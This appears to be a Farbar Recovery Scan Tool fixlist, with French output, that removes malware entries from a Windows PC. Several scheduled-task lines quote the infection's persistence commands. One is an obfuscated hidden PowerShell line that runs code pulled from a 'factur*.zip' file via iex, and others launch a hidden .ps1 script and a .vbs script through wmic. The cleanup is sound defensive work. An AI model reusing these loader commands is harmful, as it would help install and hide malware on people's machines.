start::
closeprocesses:
createrestorepoint:
HKLM\Software\...\Authentication\Credential Providers: [{503739d0-4c5e-4cfd-b3ba-d881334f0df2}] ->
Task: {45534676-3762-4DD1-B1E5-4751288BF11A} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe
Task: {5EF1200A-88FF-48C7-9CAD-7D2594809D3A} - System32\Tasks\AI => C:\WINDOWS\system32\cmd.exe /c powershell -eP bypasS -win Hi"dde"n -c "&{$v=dir c:\users -r -in factur*.zip|select -last 1;$y=gc -LiteralPat $v.fullname;$y[$y.length-1]|iex}" <==== ATTENTION
Task: {68D793C5-4127-4589-84C4-EE4252D72616} - System32\Tasks\AppRunLog => powershell.exe -wiNdowStylE HiDden -exe bypass -file C:\Users\metro\AppData\Roaming\6D788C\8XbAIxIm77GG3R7OyZ7R7R.ps1
Task: {6DADBC0E-4DD0-47B0-80ED-A180F5EF2218} - System32\Tasks\kctwswdq => wmic.exe process call create "wscript.exe C:\Users\metro\AppData\Roaming\upxrkcff\kctwswdq.vbs"
C:\Users\metro\AppData\Roaming\upxrkcff
Task: {7387BBCC-A5E8-4DBD-980B-7B2227E03120} - \Microsoft\Windows\UNP\RunCampaignManager -> Pas de fichier <==== ATTENTION
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
emptytemp:
end::